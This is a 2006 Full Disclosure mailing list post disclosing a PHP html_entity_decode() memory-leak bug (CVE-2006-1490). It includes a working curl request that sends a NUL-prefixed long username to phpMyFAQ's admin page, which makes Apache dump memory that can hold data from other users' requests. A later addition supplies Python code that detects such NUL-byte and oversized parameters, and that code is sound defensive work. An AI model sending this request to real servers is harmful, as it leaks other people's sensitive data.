Full Disclosure mailing list archives

phpmyfaq exploit using PHP bug, CVE-2006-1490


From: Tonu Samuel <tonu () jes ee>
Date: Fri, 1 Dec 2006 16:57:41 +0200

A long time ago I made unnecessary noise about a PHP zeroday. I expected it to be 
maybe much more dangerous than it appeared to be in the end. There was a lot of 
discussion and one of the main consensus points was that this bug is not exploitable 
in the real world because no one is using those vulnerable functions.

This bug was originally found using the phpmyfaq software and a wrong assumption was 
made about the wideness of the problem. Anyway, now half a year later it is time to show 
the exploit:

curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d 
"faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

The longer the input you provide, the longer the memory dump you get. Works if PHP is 
unpatched AND phpmyfaq is older than 1.6.0. The memory dump you get is part of 
Apache memory and often contains sensitive information from other served 
pages and contexts.

To make it clear - this is NOT the fault of the phpmyfaq people at all. Even more, 
they made a workaround within an hour after I contacted them and urged users to 
upgrade. It's just that phpmyfaq appears to be one popular piece of software which is easily 
findable by Google and this was the software where the initial discovery was 
made. The PHP people knew about the problem but ignored it for long enough for it to be 
discovered independently of them.

   Tõnu
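Detection and mitigation logic for the request pattern described in the post, added here as an example that is not part of the original message or of phpMyFAQ or PHP: it percent-decodes form bodies, flags any parameter carrying a NUL byte (the trigger for the html_entity_decode() bug) or an abnormally long value (which sets the size of the leak), and shows a refuse-on-NUL wrapper a defender can put in front of the decoder. The length threshold, the (path, body) record format and the sample bodies are constructed assumptions.

```python
from urllib.parse import parse_qsl

# Constructed threshold (assumption): a login field longer than this is suspect.
MAX_VALUE_LEN = 128


def inspect_form_body(body, max_len=MAX_VALUE_LEN):
    """Return one finding per parameter that carries a NUL byte or is oversized.
    parse_qsl() percent-decodes, so '%00' becomes '\\x00' before the check."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        reasons = []
        if "\x00" in value:
            reasons.append("nul-byte")      # what triggers the html_entity_decode() leak
        if len(value) > max_len:
            reasons.append("oversized")     # input length controls how much memory leaks
        if reasons:
            findings.append({"param": name, "length": len(value), "reasons": reasons})
    return findings


def scan_requests(records, max_len=MAX_VALUE_LEN):
    """records: iterable of (path, body) pairs, e.g. from a request-logging proxy
    (assumed format). Returns one alert per suspicious parameter."""
    alerts = []
    for path, body in records:
        for finding in inspect_form_body(body, max_len):
            alerts.append({"path": path, **finding})
    return alerts


def is_safe_for_decode(value):
    """Defensive pre-check: a string containing NUL must never reach the decoder."""
    return "\x00" not in value


# Constructed sample traffic (not real logs): one benign login, one probe.
SAMPLE_RECORDS = [
    ("/phpmyfaq/admin/index.php", "faqusername=alice&faqpassword=s3cret"),
    ("/phpmyfaq/admin/index.php", "faqusername=%00" + "E" * 200 + "&faqpassword="),
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_RECORDS):
        print(alert)
```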

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
